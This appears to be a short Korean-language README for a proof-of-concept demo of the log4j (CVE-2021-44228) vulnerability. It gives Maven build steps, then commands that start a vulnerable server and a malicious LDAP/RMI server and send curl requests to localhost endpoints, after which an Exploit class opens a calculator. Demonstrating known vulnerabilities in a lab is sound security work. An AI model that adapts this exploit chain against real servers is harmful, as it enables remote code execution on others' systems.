
log4j (CVE-2021-44228) 취약점을 실행하는 방법을 강조하는 데모 프로젝트
log4j(CVE-2021-44228) 취약점을 실행하는 방법을 보여주는 데모 프로젝트
빠르게 설정하기 위해 Spring Boot를 사용했습니다. 하드코딩이 많지만 이해해 주세요. POC일 뿐입니다.
Java 8이 설치되어 있어야 합니다. Maven으로 빌드: mvn clean package -DskipTests. 별도의 쉘 창에서 다음 명령을 실행하세요:
java -jar vulnerable-server/target/vulnerable-server.jar
java -jar malicious-server/target/malicious-server.jar
curl http://localhost:8880/victimLDAP
curl http://localhost:8880/victimRMI
Exploit 클래스의 코드가 실행되어 계산기를 띄웁니다.